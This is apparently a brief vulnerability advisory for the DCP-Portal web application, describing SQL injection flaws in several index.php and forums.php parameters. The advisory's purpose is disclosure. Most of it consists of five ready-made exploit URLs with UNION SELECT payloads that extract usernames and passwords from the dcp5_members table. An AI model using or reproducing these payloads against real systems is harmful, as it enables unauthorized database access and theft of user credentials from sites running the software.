Description
|
|
Several vulnerabilities were reported in DCP-Portal, which could be exploited by attackers to execute arbitrary commands. These flaws reside in the "index.php" files when handling specially crafted "cat", "doc", "uid", "mid", "bid" parameters, wich may be exploited to conduct SQL Injection attacks.
http://server/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT
null,password FROM dcp5_members WHERE username=%27[username]
http://server/index.php?page=documents&doc=-99%27 UNION SELECT
null,null,username,password,null,null,null,null,null,null,null,null
FROM dcp5_members WHERE username=%27[username]
http://server/index.php?page=mdetails&uid=-99%27 UNION SELECT
null,null,null,username,null,null,null,null,password,null,null,null,
null,null,null,null,null,null,null,null,null FROM dcp5_members WHERE
username=%27[username]
http://server/forums.php?action=showmsg&mid=-99%27 UNION SELECT
null,null,null,password,null,username,null,null,null FROM
dcp5_members WHERE username=%27[username]
http://server/forums.php?action=board&bid=-99%27UNION SELECT
null,null,password,null FROM dcp5_members WHERE username=%27
[username]
|